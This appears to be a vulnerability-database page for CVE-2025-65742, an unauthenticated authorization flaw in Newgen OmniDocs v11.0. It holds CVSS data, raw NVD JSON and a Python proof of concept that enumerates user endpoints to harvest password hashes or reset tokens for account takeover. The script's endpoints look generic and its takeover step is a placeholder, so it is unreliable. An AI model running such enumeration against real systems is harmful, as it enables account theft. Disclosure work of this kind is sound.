Security Vulnerability Report
中文
CVE-2025-65742 CVSS 8.2 HIGH

CVE-2025-65742

Published: 2025-12-15 17:15:54
Last Modified: 2025-12-23 18:03:04

Description

An unauthenticated Broken Function Level Authorization (BFLA) vulnerability in Newgen OmniDocs v11.0 allows attackers to obtain sensitive information and execute a full account takeover via a crafted API request.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:newgensoft:omnidocs:11.0:*:*:*:*:*:*:* - VULNERABLE
Newgen OmniDocs v11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-65742 PoC - Newgen OmniDocs BFLA Vulnerability # Target: Newgen OmniDocs v11.0 # Vulnerability: Broken Function Level Authorization TARGET_URL = "http://target-server:8080" def exploit_bfla(): """ Exploit BFLA vulnerability to obtain sensitive information and perform account takeover """ # Step 1: Enumerate and access sensitive API endpoints without authentication headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Example: Access user list endpoint (requires no authentication) user_list_url = f"{TARGET_URL}/api/users/list" response = requests.get(user_list_url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Successfully accessed user list endpoint") users = response.json() print(f"[+] Found {len(users)} users") # Step 2: Obtain sensitive information for target user for user in users: user_id = user.get('id') # Access user details to get password hash or reset token user_detail_url = f"{TARGET_URL}/api/users/{user_id}/details" detail_response = requests.get(user_detail_url, headers=headers) if detail_response.status_code == 200: user_data = detail_response.json() print(f"[+] Obtained user data: {json.dumps(user_data, indent=2)}") # Step 3: Perform account takeover using obtained credentials # (Additional exploitation steps would be added here) if __name__ == "__main__": print("CVE-2025-65742 PoC - Newgen OmniDocs BFLA") exploit_bfla()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65742", "sourceIdentifier": "[email protected]", "published": "2025-12-15T17:15:53.617", "lastModified": "2025-12-23T18:03:03.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated Broken Function Level Authorization (BFLA) vulnerability in Newgen OmniDocs v11.0 allows attackers to obtain sensitive information and execute a full account takeover via a crafted API request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newgensoft:omnidocs:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "55480438-8464-41FD-BB65-39DDFE1A1AE6"}]}]}], "references": [{"url": "https://github.com/CBx216/CVE-2025-65742-Newgen-OmniDocs-LDAP-BFLA/blob/main/CVE-2025-65742.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://newgensoft.com/", "source": "[email protected]", "tags": ["Product"]}]}}